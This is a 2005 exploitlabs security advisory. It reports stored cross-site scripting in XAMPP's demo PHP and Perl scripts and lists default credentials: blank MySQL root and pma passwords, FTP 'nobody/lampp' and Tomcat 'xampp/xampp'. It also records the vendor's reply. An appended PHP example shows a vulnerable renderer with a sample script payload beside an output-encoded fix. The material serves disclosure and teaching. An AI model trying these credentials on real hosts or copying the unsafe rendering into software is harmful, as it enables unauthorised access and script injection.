------------------------------------------------------------
- EXPL-A-2005-006 exploitlabs.com Advisory 035 -
------------------------------------------------------------
- XAMPP -


OVERVIEW
========

XAMPP is an easy to install Apache distribution containing MySQL, PHP
and Perl. XAMPP is really very easy to install and to use - just
download, extract and start.

http://www.apachefriends.org/en/xampp.html


AFFECTED PRODUCTS
=================

Windows Version 1.4.X
http://www.apachefriends.org/en/xampp-windows.html

Linux 1.4.X ( all )
http://www.apachefriends.org/en/xampp-linux.html

Solaris 0.3 ( all )
http://www.apachefriends.org/en/xampp-solaris.html


DETAILS
=======

1. Persistent XSS is present in user-supplied input fields, allowing
   attackers to render any JavaScript in the user's browser. Some
   JavaScript will break the application, disallowing further user
   input to the script.

   http://[host]/xampp/cds.php
   http://[host]/xampp/guestbook-en.pl ( linux )
   http://[host]/xampp/phonebook.php

2. Default / install usernames and passwords: by viewing
   http://[host]/xampp/security.php, XAMPP discloses the usernames /
   passwords ( examples below ).

Item 2a
-------
The phpMyAdmin user pma has no password                    UNSECURE

phpMyAdmin saves your preferences in an extra MySQL database. To access
this data phpMyAdmin uses the special user pma. This user has in the
default installation no password set and to avoid any security problems
you should give him a passwort.

Item 2b
-------
The MySQL user root has no password                        UNSECURE

Every local user on Linux box can access your MySQL database with
administrator rights. You should set a password.

Item 2c
-------
The FTP password for user nobody is still 'lampp'          UNSECURE

By using the default password for the FTP user nobody everyone can
upload and change files for your XAMPP webserver. So if you enabled
ProFTPD you should set a new password for user nobody.
Item 2d
-------
Tomcat Admin/Config User for XAMPP:
User: xampp
Password: xampp


PROOF OF CONCEPT
================

Item 1a
-------
http://[host]/xampp/cds.php
enter text... stores values in the mysql database; see also 1c

Item 1b
-------
http://[host]/xampp/guestbook-en.pl
see 1c

Item 1c
-------
http://[host]/xampp/phonebook.php
enter into an input field... and when rendered it forcibly redirects
the user to http://evilattacker


SOLUTION
========

none ( see vendor response )

vendor response:
----------------

Dear Donnie!

> you have a severely insecure package.
> here are my raw notes.

Thank you for your notes. But XAMPP is meant only for internal
development usage and not on production systems. See
http://www.apachefriends.org/en/xampp.html (section "The philosophy").

The vulnerable scripts are only very simple demonstration programs to
test the functions of Apache/MySQL/etc. and to give beginners first
inspirations in programming. Also these scripts are not meant for
public usage.

But you may be right. We should make the warning messages about the
dangers of use for our software bigger.

researcher comment:
-------------------

A disclaimer of this type does not mitigate the security issues present
in XAMPP. This package is targeted at beginners, the very users who need
to be protected the most and taught secure by default.


CREDITS
=======

This vulnerability was discovered and researched by Donnie Werner of
exploitlabs.

Donnie Werner
Information Security Specialist
security@exploitlabs.com
--
web: http://exploitlabs.com
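Added example, not part of the advisory and not XAMPP's own phonebook.php: a minimal phonebook-style script that shows the stored-XSS pattern described in DETAILS item 1 and PROOF OF CONCEPT items 1a-1c, beside the hardened rendering that HTML-encodes stored values at output time. It assumes a PHP CLI with the pdo_sqlite extension; the table name, column names and the two sample submissions are constructed for the demonstration.

```php
<?php
// Added example (not XAMPP's phonebook.php): stored XSS and its fix.
// Uses an in-memory SQLite database through PDO so it runs stand-alone
// (assumption: pdo_sqlite is available). Run with: php phonebook_example.php
declare(strict_types=1);

// Constructed sample submissions: one benign entry, one carrying markup
// of the kind the advisory describes being stored and later rendered.
$submissions = [
    ['name' => 'Alice',                     'phone' => '555-0100'],
    ['name' => '<script>alert(1)</script>', 'phone' => '555-0199'],
];

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE phonebook (id INTEGER PRIMARY KEY, name TEXT NOT NULL, phone TEXT NOT NULL)');

// Storage: a prepared statement keeps the submitted text intact (and keeps
// SQL injection out). Encoding is NOT applied here, because the same value
// may later be emitted into HTML, JSON or a log and each needs its own encoding.
$insert = $db->prepare('INSERT INTO phonebook (name, phone) VALUES (:name, :phone)');
foreach ($submissions as $row) {
    $insert->execute([':name' => $row['name'], ':phone' => $row['phone']]);
}

// Vulnerable rendering: the pattern behind items 1a-1c. Stored text is
// concatenated straight into the page, so markup submitted once by one
// visitor executes in the browser of every visitor who views the list.
function render_unsafe(PDO $db): string
{
    $html = "<table>\n";
    foreach ($db->query('SELECT name, phone FROM phonebook ORDER BY id') as $row) {
        $html .= "<tr><td>{$row['name']}</td><td>{$row['phone']}</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Hardened rendering: every stored value is encoded for the context it lands
// in (HTML element content) immediately before output. ENT_QUOTES also covers
// attribute values; ENT_SUBSTITUTE replaces invalid byte sequences instead of
// returning an empty string; the explicit charset avoids encoding mismatches.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(PDO $db): string
{
    $html = "<table>\n";
    foreach ($db->query('SELECT name, phone FROM phonebook ORDER BY id') as $row) {
        $html .= '<tr><td>' . h($row['name']) . '</td><td>' . h($row['phone']) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

echo "--- unsafe output: the <script> tag survives verbatim ---\n";
echo render_unsafe($db);
echo "--- hardened output: the tag becomes inert &lt;script&gt; text ---\n";
echo render_safe($db);
```

The unsafe renderer emits the submitted `<script>` element unchanged; the hardened one emits `&lt;script&gt;alert(1)&lt;/script&gt;`, which the browser displays as text. Context-aware output encoding at render time is the mitigation for all three scripts named in item 1; storing the raw text with a prepared statement keeps the data intact and keeps the database layer out of the encoding decision.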